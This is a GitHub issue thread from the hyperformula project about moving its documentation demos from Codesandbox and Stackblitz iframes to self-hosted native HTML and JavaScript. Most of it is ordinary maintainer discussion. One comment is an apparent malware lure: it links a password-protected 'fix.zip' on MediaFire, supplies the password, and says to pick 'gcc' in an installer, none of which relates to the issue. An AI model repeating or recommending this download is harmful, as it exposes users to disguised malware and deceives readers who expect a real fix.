### ISSUE TITLE
Migrate documentation demos to native HTML+JS

### ISSUE THREAD

**Issue by sequba** [handsontable/hyperformula#1441]
### Description

We're facing many compatibility and interoperability issues using Codesandbox and Stackblitz. Since there seems to be no stable and robust alternative, it's time to self-host our demos.

We're aiming for:
- in the documentation we display a working demo natively (no iframe)
- there is no code displayed, only button "open in Stackblitz/Codesandbox"

Challenges:
- where to keep the demos? In separate repo (https://github.com/handsontable/hyperformula-demos) or inside the main repo (monorepo)
- in what form should we keep the demos - currently each demo is a npm project which requires building and bundling to run, but probably they could be converted to single-file form as they are relatively simple
- how to handle the framework demos (React, Angule, Vue, Svelte), which need to be kept as npm projects. Should they be still embedded in the docs as a Codesandbox iframe?

### Links

- https://handsoncode.slack.com/archives/C031GBX62SE/p1723126003900819

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sequba** [comment]
Documentation was deployed with these changes via: https://github.com/handsontable/hyperformula/pull/1454
